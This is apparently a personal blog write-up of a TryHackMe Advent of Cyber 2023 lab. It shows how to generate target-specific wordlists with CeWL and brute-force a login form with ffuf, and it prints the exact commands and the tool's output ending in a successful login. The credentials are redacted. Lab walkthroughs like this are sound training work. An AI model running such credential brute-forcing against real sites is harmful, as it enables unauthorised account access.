The fourth day of AoC23 also contains a Brute Forcing task, like yesterday.
We are tasked with testing if a hacker got access using a customised wordlist, like
We are tasked with testing if a hacker got access using a customised wordlist, like
CeWL.
Learning Objectives #
- What is
CeWL? - What are the capabilities of
CeWL? - How can we leverage
CeWLto generate a custom wordlist from a website? - How can we customise the tool’s output for a specific task?
Overview #
This is my key takeaways from today:
CeWLis a custom wordlist generator that spiders websites and creates a wordlist based on the site’s content.- Very valuable for pentesters aiming to brute-force login pages or find hidden directories using organisation-specific terminology.
CeWLcan also compile a list of email addresses or usernames identified in team members’ page links.
CeWL #
cewl -h, shows the helpcewl http://10.10.80.47 -w outfile.lst
CeWL stands out from other tools since it creates custom wordlists based on a web site and it’s content.
Here is why CeWL stands out:
- Target-specific wordlists: Craft specialised wordlists based on the victim’s website.
- Depth of search: Can spider a website to a specific depth.
- Customisable outputs: Provides options to fine-tune the wordlist, like setting a minimum word length, removing numbers etc.
- Built-in features: Can also find author meta tags (for username enumeration) and email extraction.
I had some problems when trying to run CeWL, either it didn’t save anything to the file or it said it couldn’t open the file for writing.
I solved it by just adding a redirect after the command and then removing the first line of the file.
$ cewl http://10.10.80.47 > pws.lst
Also had alot of problems getting wfuzz to work, so used ffuf with a saved request from burpsuite instead…
Questions #
- What is the correct username and password combination?
Using the following commands and tools to get the answer:
$ cewl -d 2 -m 5 http://10.10.80.47 --with-numbers > pws.lst
$ cewl -d 0 -m 5 http://10.10.80.47/team.php --lowercase > usr.lst
# Saved a request from burpsuite to login.req
$ ffuf -request login.req -request-proto http -mode clusterbomb -w usr.lst:USERFUZZ -w pws.lst:PASSFUZZ -fs 4478
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : POST
:: URL : http://10.10.80.47/login.php
:: Wordlist : USERFUZZ: /home/eplots/thm/aoc23/usr.lst
:: Wordlist : PASSFUZZ: /home/eplots/thm/aoc23/pws.lst
:: Header : Host: 10.10.80.47
:: Header : User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0
:: Header : Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
:: Header : Accept-Language: en-US,en;q=0.5
:: Header : Connection: close
:: Header : Cookie: PHPSESSID=tmg3e766pgjb3j80ohrflqg1b9
:: Header : Accept-Encoding: gzip, deflate, br
:: Header : Content-Type: application/x-www-form-urlencoded
:: Header : Origin: http://10.10.80.47
:: Header : Referer: http://10.10.80.47/login.php
:: Header : Upgrade-Insecure-Requests: 1
:: Data : username=USERFUZZ&password=PASSFUZZ
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response size: 4478
________________________________________________
[Status: 302, Size: 4442, Words: 1241, Lines: 119, Duration: 45ms]
* PASSFUZZ: [redacted]
* USERFUZZ: [redacted]
:: Progress: [9361/9361] :: Job [1/1] :: 392 req/sec :: Duration: [0:00:27] :: Errors: 0 ::
- What is the flag?
Simply read the “Confidential Message” in the webmail after logging in.